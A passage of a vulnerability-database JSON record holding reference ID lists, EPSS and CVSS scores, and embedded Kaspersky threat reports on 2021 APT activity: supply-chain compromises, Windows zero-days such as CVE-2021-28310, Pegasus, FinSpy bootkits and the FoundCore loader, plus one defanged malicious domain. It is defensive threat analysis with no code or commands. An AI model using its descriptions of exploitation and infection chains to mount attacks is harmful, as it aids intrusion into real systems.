"SECURELIST:8E9198BF0E389572981DD1AA05D0708A", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:9E653409B4D8C46D45939FA37442E456", "SECURELIST:A10F281EF99381636376D6F6C6501E22", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A3D3514100806269750A23D748D34C59", "SECURELIST:ADE333FF4D3F96FCD027E6BB825FFD9B", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C65BBC029B301149C73E48F99596B4A0", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:CE9654E321FEC18D47DA16E0CF9D0CCE", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:F6E885706A3B59254C617CE5C255F27B", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:96484", "SSV:99168"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0043F629DC5E8DA26934B2407F1C76CC", "TALOSBLOG:224F6FF67DED69B2FFFA483B3490BCE0", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:A841859916AA26CF6EF3F3F403502778", "TALOSBLOG:CF2344D3946410B628ACF0DE5E525347", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:E19A22F37E2F320BDD9B4727A5209175", "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:012EBB2FE2687F178FBCC3AB8ABEF778", "THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:1DDE95EA33D4D9F304973569FC787451", "THN:2722097C084561C0EE24E84FA6AD506E", "THN:279CDD851D8F33C8B07217F8D20F6AAA", "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "THN:52153F8855D24E20FDD2CC03040B1EF1", "THN:603F844B99A1CC0CF1DE580659626B57", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:AE8CC4929BA80C03ABF4AA5FAB5465CC", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BAC30CCFD2AEEC91A6E02417A6B55F56", "THN:CB1C2DA47986D8345154BCABBFE41314", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:F91523FE89728E4535456872C0532560", "THN:FA6A50184463DFCD20073D5EDD0F36F2", "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA"]}, {"type": "threatpost", "idList": ["THREATPOST:0A9A930C281A9194FBCA1A6C9F168F74", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:16A4E4FD8C0D84305D5ABABEBBC6343E", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:197A12EF32429D29CF6A84B11763834D", "THREATPOST:1B29120EF1DBE107B55050178910AACD", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:33E56DEB736406F9DD08C7533BF1812B", "THREATPOST:354BF51EC880C48C85D9302EDB1227D6", "THREATPOST:3DAB2A56F377207FBFA093C4AC3D52BD", "THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5A8F52C1AE647553C21FA300983F3770", "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "THREATPOST:62A15BEBBD95FBF8704B78058BF030F1", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:6C4662EB2B72616C90A201601B18E392", "THREATPOST:84E8993BD84BB1AAEE4273958FF69EDF", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:905F5C5FE38CC3228FF94F798221B3D5", "THREATPOST:9235CC6F1DCCA01B571B8693E5F7B880", "THREATPOST:9673D04DAD513AC05EA6440633D75339", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B2DDD79594EACBEAC10B02C533235986", "THREATPOST:B8EE84454BCC4614F524D8A4901907C3", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:D7E3369CE997E9EF8A0586B994225257", "THREATPOST:E44D0A1C3C7C76586EBC905270FFAC34", "THREATPOST:EA8274414AC42B3EF48CA27D45659736", "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FF8B5ACCCE8A1CE6B8A830B1D3E9E316", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71", "TRENDMICROBLOG:E0DBE764152C4FE9188A88545FADFB00"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdi", "idList": ["ZDI-20-663"]}, {"type": "zdt", "idList": ["1337DAY-ID-27607", "1337DAY-ID-27617", "1337DAY-ID-27662", "1337DAY-ID-28811", "1337DAY-ID-37433"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:F65CF017-1855-42E3-9922-BF6F9F078DD9"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "canvas", "idList": ["OFFICE_WSDL"]}, {"type": "cert", "idList": ["VU:921560"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0521", "CPAI-2020-0727", "CPAI-2021-0032", "CPAI-2021-0223", "CPAI-2021-0316", "CPAI-2021-0318"]}, {"type": "cisa", "idList": ["CISA:41E2EC8FEF1331C724A39C3DCCFB0834", "CISA:911DE59572B6EF78B42DD868D622F637"]}, {"type": "cve", "idList": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2021-1732"]}, {"type": "exploitdb", "idList": ["EDB-ID:41894", "EDB-ID:41934"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0"]}, {"type": "fireeye", "idList": ["FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:F58154E35F166E87B591935191A7EA69"]}, {"type": "githubexploit", "idList": ["02C6FE13-5036-5BE5-8AC8-278A918BA581", "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "1D0AAF42-5E68-5985-A800-90937D55628D", "241CA368-5AF2-555C-91EE-5D10B229F97D", "399B15EF-A742-5722-86D2-59F3580C307B", "51858F11-1259-5A40-82DF-DD7D62A7B11A", "5E516DC2-BF71-57D0-9A87-3874146D0F83", "730EEC4F-BE81-5690-BA8D-B89482C5C3D0", "91A5BC48-2410-555B-B7FB-8138577D6B78", "DEAA3BF4-9E7D-55E9-9534-6203A312C46F"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "hivepro", "idList": ["HIVEPRO:E73184FF060DA7208BAF888A5AF221EF"]}, {"type": "kaspersky", "idList": ["KLA10995"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_WORD_HTA"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0199", "MS:CVE-2020-1380", "MS:CVE-2021-1732"]}, {"type": "mskb", "idList": ["KB3141529", "KB3141538", "KB3178703"]}, {"type": "mssecure", "idList": ["MSSECURE:7D81C7477636B6DB964C5D3E62D605D5"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4561608.NASL", "SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561649.NASL", "SMB_NT_MS20_JUN_4561666.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310817140", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817157"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142211", "PACKETSTORM:142281", "PACKETSTORM:143164"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:22507355C87630C1D3B720E2ED98701A", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:FFC962F3C57B514805A24EA07FF565A1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:BDA3EA90B57FC8895B98DAADBAE3D7DE", "RAPID7COMMUNITY:DADF9A5B22CCB70155177EBC2E86131E"]}, {"type": "saint", "idList": ["SAINT:3A3289A18B5C46A88581C9E8D4D0CF5A", "SAINT:5DC0FF1D23C8E8C36A1A8D72F1EB2B74"]}, {"type": "securelist", "idList": ["SECURELIST:0C40BC07DFF80D4B158D166D0DC2C870", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "SECURELIST:9E653409B4D8C46D45939FA37442E456"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:96484"]}, {"type": "talosblog", "idList": ["TALOSBLOG:CF2344D3946410B628ACF0DE5E525347"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:2722097C084561C0EE24E84FA6AD506E", "THN:AE8CC4929BA80C03ABF4AA5FAB5465CC", "THN:BAC30CCFD2AEEC91A6E02417A6B55F56", "THN:CB1C2DA47986D8345154BCABBFE41314", "THN:F91523FE89728E4535456872C0532560"]}, {"type": "threatpost", "idList": ["THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:84E8993BD84BB1AAEE4273958FF69EDF", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0DBE764152C4FE9188A88545FADFB00"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdi", "idList": ["ZDI-20-663"]}, {"type": "zdt", "idList": ["1337DAY-ID-27607"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-0199", "epss": "0.974860000", "percentile": "0.999420000", "modified": "2023-03-17"}, {"cve": "CVE-2020-0986", "epss": "0.000690000", "percentile": "0.279770000", "modified": "2023-03-17"}, {"cve": "CVE-2020-1380", "epss": "0.323640000", "percentile": "0.963140000", "modified": "2023-03-17"}, {"cve": "CVE-2021-1732", "epss": "0.003950000", "percentile": "0.692850000", "modified": "2023-03-17"}, {"cve": "CVE-2021-22893", "epss": "0.970000000", "percentile": "0.995340000", "modified": "2023-03-17"}, {"cve": "CVE-2021-28310", "epss": "0.000430000", "percentile": "0.075700000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31955", "epss": "0.973570000", "percentile": "0.997920000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31956", "epss": "0.001660000", "percentile": "0.516220000", "modified": "2023-03-17"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1659988328, "score": 1659990670, "epss": 1679098904}, "_internal": {"score_hash": "050fd6c82c307562302fbfe5761e89c1"}}

{"securelist": [{"lastseen": "2021-11-30T10:36:53", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/29150529/ksb-2021_APT-review-year-990x400.jpg)\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it's important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International's Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India's Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with "malicious malware and spyware".\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority's website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several infrastructures on the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren't able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn't find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the associated cluster MysterySnail and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for "legal surveillance" purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving usage of a UEFI or MBR bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by Slingshot agent on multiple occasions, whereby Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it's not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor's activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/12091857/abstract_malware_report-990x400.jpg)\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01-1024x430.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: 